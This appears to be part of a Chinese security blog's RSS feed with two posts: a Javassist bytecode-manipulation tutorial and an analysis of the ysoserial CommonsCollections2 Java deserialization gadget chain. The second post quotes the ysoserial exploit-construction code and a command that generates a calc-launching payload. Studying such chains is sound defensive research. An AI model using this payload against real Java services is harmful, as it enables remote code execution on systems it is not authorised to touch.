<p>使用<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>ssist来创建一个Person类</p>
<pre><code class="language-java ">package com.y4er.learn;

import javassist.*;


public class CreateClass {
    public static void main(String[] args) throws Exception {
        // 获取javassist维护的类池
        ClassPool pool = ClassPool.getDefault();

        // 创建一个空类com.y4er.learn.Person
        CtClass ctClass = pool.makeClass("com.y4er.learn.Person");

        // 给ctClass类添加一个string类型的字段为name
        CtField name = new CtField(pool.get("java.lang.String"), "name", ctClass);

        // 设置private权限
        name.setModifiers(Modifier.PRIVATE);

        // 初始化name字段为zhangsan
        ctClass.addField(name, CtField.Initializer.constant("zhangsan"));

        // 生成get、set方法
        ctClass.addMethod(CtNewMethod.getter("getName",name));
        ctClass.addMethod(CtNewMethod.setter("setName",name));

        // 添加无参构造函数
        CtConstructor ctConstructor = new CtConstructor(new CtClass[]{}, ctClass);
        ctConstructor.setBody("{name="xiaoming";}");
        ctClass.addConstructor(ctConstructor);

        // 添加有参构造
        CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{pool.get("java.lang.String")}, ctClass);
        ctConstructor1.setBody("{$0.name=$1;}");
        ctClass.addConstructor(ctConstructor1);

        // 创建一个public方法printName() 无参无返回值
        CtMethod printName = new CtMethod(CtClass.voidType, "printName", new CtClass[]{}, ctClass);
        printName.setModifiers(Modifier.PUBLIC);
        printName.setBody("{System.out.println($0.name);}");
        ctClass.addMethod(printName);

        // 写入class文件
        ctClass.writeFile();
        ctClass.detach();
    }
}
</code></pre>
<p>执行完之后生成了Person.class<br />
<img src="https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/bd087a27-b715-166e-6d57-531c662738af.png" alt="image.png" /></p>
<h2>使用方法</h2>
<p>从上文的demo中可以看到部分使用方法，在javassist中CtClass代表的就是类class，ClassPool就是CtClass的容器，ClassPool维护了所有创建的CtClass对象，需要注意的是当CtClass数量过大会占用大量内存，需要调用CtClass.detach()释放内存。</p>
<p>ClassPool重点有以下几个方法：<br />
1. getDefault() 单例获取ClassPool<br />
2. appendClassPath() 将目录添加到ClassPath<br />
3. insertClassPath() 在ClassPath插入jar<br />
4. get() 根据名称获取CtClass对象<br />
5. toClass() 将CtClass转为Class 一旦被转换则不能修改<br />
6. makeClass() 创建新的类或接口</p>
<p>更多移步官方文档：http://www.javassist.org/html/javassist/ClassPool.html</p>
<p>CtClass需要关注的方法：<br />
1. addConstructor() 添加构造函数<br />
2. addField() 添加字段<br />
3. addInterface() 添加接口<br />
4. addMethod​() 添加方法<br />
5. freeze() 冻结类使其不能被修改<br />
6. defrost() 解冻使其能被修改<br />
7. detach() 从ClassPool中删除类<br />
8. toBytecode() 转字节码<br />
9. toClass() 转Class对象<br />
10. writeFile() 写入.class文件<br />
11. setModifiers​() 设置修饰符</p>
<p>移步：http://www.javassist.org/html/javassist/CtClass.html</p>
<p>CtMethod继承CtBehavior，需要关注的方法：<br />
1. insertBefore 在方法的起始位置插入代码<br />
2. insterAfter 在方法的所有 return 语句前插入代码<br />
3. insertAt 在指定的位置插入代码<br />
4. setBody 将方法的内容设置为要写入的代码，当方法被 abstract修饰时，该修饰符被移除<br />
5. make 创建一个新的方法</p>
<p>更多移步：http://www.javassist.org/html/javassist/CtBehavior.html</p>
<p>在setBody()中我们使用了<code>$</code>符号代表参数</p>
<pre><code class="language-java ">// $0代表this $1代表第一个传入的参数 类推
printName.setBody("{System.out.println($0.name);}");
</code></pre>
<h2>使用CtClass生成对象</h2>
<p>上文我们生成了一个ctClass对象对应的是Person.class，怎么调用Person类生成对象、调用属性或方法？</p>
<p>三种方法：<br />
1. 反射方式调用<br />
2. 加载class文件<br />
3. 通过接口</p>
<h3>反射调用</h3>
<pre><code class="language-java ">// 实例化
Object o = ctClass.toClass().newInstance();
Method setName = o.getClass().getMethod("setName", String.class);
setName.invoke(o,"Y4er");
Method printName1 = o.getClass().getMethod("printName");
printName1.invoke(o);
</code></pre>
<h3>加载class文件</h3>
<pre><code class="language-java ">ClassPool pool = ClassPool.getDefault();
pool.appendClassPath("E:\code\java\javassist-learn\com\y4er\learn");
CtClass PersonClass = pool.get("com.y4er.learn.Person");
Object o = PersonClass.toClass().newInstance();
//接下来反射调用
</code></pre>
<h3>通过接口调用</h3>
<p>新建一个接口IPerson，将Person类的方法全部抽象出来</p>
<pre><code class="language-java ">package com.y4er.learn;

public interface IPerson {
    String getName();

    void setName(String name);

    void printName();
}
</code></pre>
<pre><code class="language-java ">ClassPool pool = ClassPool.getDefault();
pool.appendClassPath("E:\code\java\javassist-learn\com\y4er\learn\Person.class");

CtClass IPerson = pool.get("com.y4er.learn.IPerson");
CtClass Person = pool.get("com.y4er.learn.Person");
Person.defrost();
Person.setInterfaces(new CtClass[]{IPerson});

IPerson o = (IPerson) Person.toClass().newInstance();
o.setName("aaa");
System.out.println(o.getName());
o.printName();
</code></pre>
<p>将Person类实现IPerson接口，然后创建实例时直接强转类型，就可以直接调用了。</p>
<h2>修改现有的类</h2>
<p>javassist大多数情况下用户修改已有的类，比如常见的日志切面。我仍然使用Person类来讲解：</p>
<pre><code class="language-java ">//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package com.y4er.learn;

public class Person implements IPerson {
    private String name = "zhangsan";

    public String getName() {
        return this.name;
    }

    public void setName(String var1) {
        this.name = var1;
    }

    public Person() {
        this.name = "xiaoming";
    }

    public Person(String var1) {
        this.name = var1;
    }

    public void printName() {
        System.out.println(this.name);
    }
}

</code></pre>
<p>此时我想在printName方法的执行效果如下</p>
<pre><code class="language-text ">------ printName start ------
xiaoming
------ printName  over ------
</code></pre>
<p>写一下代码：</p>
<pre><code class="language-java ">pool.appendClassPath("E:\code\java\javassist-learn\com\y4er\learn\Person.class");
CtClass Person = pool.get("com.y4er.learn.Person");
Person.defrost();

CtMethod printName1 = Person.getDeclaredMethod("printName", null);
printName1.insertBefore("System.out.println("------ printName start ------");");
printName1.insertAfter("System.out.println("------ printName  over ------");");

Object o = Person.toClass().newInstance();
Method printName2 = o.getClass().getMethod("printName");
printName2.invoke(o, null);
</code></pre>
<p>很轻松实现了切面<br />
<img src="/wp-content/uploads/2020/04/de0e623b-7f11-77a1-0cb8-f38c2c76c5ea.png" alt="image.png" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ysoserial CommonsCollections2 反序列化分析</title>
		<link>/audit/1501.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 20 Apr 2020 04:42:24 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[ysoserial]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1501</guid>

					<description><![CDATA[复现 JDK8u221，生成反序列化文件 java -jar ysoserial-master-30099844c6-1.jar CommonsCollections2 calc ...]]></description>
										<content:encoded><![CDATA[<h2>复现</h2>
<p>JDK8u221，生成<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>文件</p>
<pre><code class="language-java ">java -jar ysoserial-master-30099844c6-1.jar CommonsCollections2 calc &gt; test.ser
</code></pre>
<p>构造反序列化点</p>
<pre><code class="language-java ">package com.xxe.run;

import java.io.FileInputStream;
import java.io.ObjectInputStream;

public class CommonsCollections2 {
    public static void main(String[] args) {
        readObject();
    }

    public static void readObject() {
        FileInputStream fis = null;
        try {
            fis = new FileInputStream("web/test.ser");
            ObjectInputStream ois = new ObjectInputStream(fis);
            ois.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p><img src="https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/bc41003e-a6cc-c25e-afc6-064eb6617479.png" alt="image.png" /></p>
<h2>分析</h2>
<p>gadget chain</p>
<pre><code class="">/*
    Gadget chain:
        ObjectInputStream.readObject()
            PriorityQueue.readObject()
                ...
                    TransformingComparator.compare()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Runtime.exec()
 */
</code></pre>
<p><span class="wpcom_tag_link"><a href="/tags/ysoserial" title="ysoserial" target="_blank">ysoserial</a></span>的exp</p>
<pre><code class="language-java ">public Queue&lt;Object&gt; getObject(final String command) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(command);
    // mock method name until armed
    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

    // create queue with numbers and basic comparator
    final PriorityQueue&lt;Object&gt; queue = new PriorityQueue&lt;Object&gt;(2,new TransformingComparator(transformer));
    // stub data for replacement later
    queue.add(1);
    queue.add(1);

    // switch method called by comparator
    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

    // switch contents of queue
    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = templates;
    queueArray[1] = 1;

    return queue;
}
</code></pre>
<p>反序列化从PriorityQueue开始，进入PriorityQueue的readObject()</p>
<blockquote><p>
  PriorityQueue 一个基于优先级的无界优先级队列。<strong>优先级队列的元素按照其自然顺序进行排序</strong>，或者根据构造队列时提供的 Comparator 进行排序，具体取决于所使用的构造方法。该队列不允许使用 null 元素也不允许插入不可比较的对象(没有实现Comparable接口的对象)。PriorityQueue 队列的头指排序规则最小的元素。如果多个元素都是最小值则随机选一个。PriorityQueue 是一个无界队列，但是初始的容量(实际是一个Object[])，随着不断向优先级队列添加元素，其容量会自动扩容，无需指定容量增加策略的细节。
</p></blockquote>
<pre><code class="language-java ">private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();

    // Read in (and discard) array length
    s.readInt();

    SharedSecrets.getJavaOISAccess().checkArray(s, Object[].class, size);
    queue = new Object[size];

    // Read in all elements.
    for (int i = 0; i &lt; size; i++)
        queue[i] = s.readObject();

    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}
</code></pre>
<p>既然是一个优先级队列，那么必然存在排序，在heapify()中</p>
<pre><code class="language-java ">private void heapify() {
    for (int i = (size &gt;&gt;&gt; 1) - 1; i &gt;= 0; i--)
        siftDown(i, (E) queue[i]); // 进行排序
}
private void siftDown(int k, E x) {
    if (comparator != null) 
        siftDownUsingComparator(k, x); // 如果指定比较器就使用
    else
        siftDownComparable(k, x);  // 没指定就使用默认的自然比较器
}
private void siftDownUsingComparator(int k, E x) {
    int half = size &gt;&gt;&gt; 1;
    while (k &lt; half) {
        int child = (k &lt;&lt; 1) + 1;
        Object c = queue[child];
        int right = child + 1;
        if (right &lt; size &amp;&amp;
            comparator.compare((E) c, (E) queue[right]) &gt; 0)
            c = queue[child = right];
        if (comparator.compare(x, (E) c) &lt;= 0)
            break;
        queue[k] = c;
        k = child;
    }
    queue[k] = x;
}
private void siftDownComparable(int k, E x) {
    Comparable&lt;? super E&gt; key = (Comparable&lt;? super E&gt;)x;
    int half = size &gt;&gt;&gt; 1;        // loop while a non-leaf
    while (k &lt; half) {
        int child = (k &lt;&lt; 1) + 1; // assume left child is least
        Object c = queue[child];
        int right = child + 1;
        if (right &lt; size &amp;&amp;
            ((Comparable&lt;? super E&gt;) c).compareTo((E) queue[right]) &gt; 0)
            c = queue[child = right];
        if (key.compareTo((E) c) &lt;= 0)
            break;
        queue[k] = c;
        k = child;
    }
    queue[k] = key;
}
</code></pre>
<p>两个排序使用选择排序法将入列的元素放到队列左边或右边。那么comparator从哪来？</p>
<p><img src="/wp-content/uploads/2020/04/8b2bb7e0-7cc6-6623-58ba-c5bb444c189a.png" alt="image.png" /></p>
<p>在PriorityQueue中定义了comparator字段</p>
<pre><code class="language-java ">private final Comparator&lt;? super E&gt; comparator;
</code></pre>
<p>在PriorityQueue中有这样一个其构造方法<br />
<img src="/wp-content/uploads/2020/04/63413fbf-eb15-ff1b-ecc3-7cd50027bb97.png" alt="image.png" /></p>
<p>所以可以通过实例化赋值。</p>
<p>为什么要用到PriorityQueue？在之前的cc链分析文章中我们讲过cc链的核心问题是出在<code>org.apache.commons.collections4.functors.InvokerTransformer#transform</code>的反射任意方法调用。我们反序列化时必须自动触发transform()函数，而在<code>org.apache.commons.collections4.comparators.TransformingComparator#compare</code>中调用了这个函数</p>
<p><img src="/wp-content/uploads/2020/04/08abca24-411c-35bb-11ec-d6e4c3c11aa5.png" alt="image.png" /></p>
<p>this.transformer是Transformer类，在exp中承载的就是InvokerTransformer，而TransformingComparator也是比较器，我们可以通过PriorityQueue队列自动排序的特性触发compare()，进一步触发transform()。</p>
<p>小结一下：<br />
1. PriorityQueue队列会自动排序触发比较器的compare()<br />
2. TransformingComparator是比较器并且在其compare()中调用了transform()<br />
3. transform()可以反射任意方法</p>
<p>到目前为止我们可以通过反序列化调用任意方法，但是不能像cc5构造的ChainedTransformer那样链式调用，继续看exp怎么构造的。</p>
<p><img src="/wp-content/uploads/2020/04/04b4d6e0-89ef-1d4d-e177-5bf114f0b1b3.png" alt="image.png" /></p>
<p>向队列中加入两个&#8221;1&#8243;占位然后将第一个元素修改为templates，追溯templates到createTemplatesImpl</p>
<pre><code class="language-java ">public static Object createTemplatesImpl ( final String command ) throws Exception {
    if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
        return createTemplatesImpl(
            command,
            Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
            Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
            Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));
    }

    return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
}

public static &lt;T&gt; T createTemplatesImpl(final String command, Class&lt;T&gt; tplClass, Class&lt;?&gt; abstTranslet, Class&lt;?&gt; transFactory, String template)
    throws Exception {
    final T templates = tplClass.newInstance();

    // use template gadget class
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    pool.insertClassPath(new ClassClassPath(abstTranslet));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());
    // run command in static initializer
    // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections

    clazz.makeClassInitializer().insertAfter(template);
    // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
    clazz.setName("ysoserial.Pwner" + System.nanoTime());
    CtClass superC = pool.get(abstTranslet.getName());
    clazz.setSuperclass(superC);

    final byte[] classBytes = clazz.toBytecode();

    // inject class bytes into instance
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{
        classBytes, ClassFiles.classAsBytes(Foo.class)
    });

    // required to make TemplatesImpl happy
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
    return templates;
}
</code></pre>
<p>上面这段代码做了以下几件事：<br />
1. 实例化了一个<code>org.apache.xalan.xsltc.trax.TemplatesImpl</code>对象templates，该对象<code>_bytecodes</code>可以存放字节码<br />
2. 自己写了一个<code>StubTransletPayload</code>类 继承<code>AbstractTranslet</code>并实现<code>Serializable</code>接口<br />
3. 获取<code>StubTransletPayload</code>字节码并使用<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>ssist插入<code>templates</code>字节码(Runtime.exec命令执行)<br />
4. 反射设置<code>templates</code>的<code>_bytecodes</code>为包含命令执行的字节码</p>
<blockquote><p>
  javassist是Java的一个库，可以修改字节码。参考 <a class="wp-editor-md-post-content-link" href="https://www.cnblogs.com/rickiyang/p/11336268.html">javassist使用全解析</a>
</p></blockquote>
<p>现在准备好了反序列化的类，上个小结中我们实现了任意方法调用。在看exp中把<code>iMethodName</code>设置为<code>newTransformer</code><br />
<img src="/wp-content/uploads/2020/04/eb9c372c-befc-300d-dbd3-d0b05682e205.png" alt="image.png" /></p>
<p>然后到了<code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#newTransformer</code><br />
<img src="/wp-content/uploads/2020/04/f8343331-532a-3be3-ea95-f8b3f2f49576.png" alt="image.png" /></p>
<p>跟进getTransletInstance()<br />
<img src="/wp-content/uploads/2020/04/bd584d7b-e9e3-5389-6467-4ac418e6104b.png" alt="image.png" /></p>
<p>根据方法名就能猜出来defineTransletClasses()是通过字节码定义类，然后通过newInstance()实例化，跟进defineTransletClasses()看下</p>
<pre><code class="language-java ">private void defineTransletClasses()
    throws TransformerConfigurationException {

    if (_bytecodes == null) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
        throw new TransformerConfigurationException(err.toString());
    }

    TransletClassLoader loader = (TransletClassLoader)
        AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
            }
        });

    try {
        final int classCount = _bytecodes.length;
        _class = new Class[classCount];

        if (classCount &gt; 1) {
            _auxClasses = new HashMap&lt;&gt;();
        }

        for (int i = 0; i &lt; classCount; i++) {
            _class[i] = loader.defineClass(_bytecodes[i]);
            final Class superClass = _class[i].getSuperclass();

            // Check if this is the main class
            if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                _transletIndex = i;
            }
            else {
                _auxClasses.put(_class[i].getName(), _class[i]);
            }
        }

        if (_transletIndex &lt; 0) {
            ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }
    catch (ClassFormatError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
    catch (LinkageError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
}
</code></pre>
<p>通过字节码加载<code>StubTransletPayload</code>类，然后实例化<code>StubTransletPayload</code>类对象，在实例化时触发Runtime.exec造成RCE。</p>
<h2>参考</h2>
<ol>
<li>https://xz.aliyun.com/t/1756</li>
<li>https://www.cnblogs.com/rickiyang/p/11336268.html</li>
</ol>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
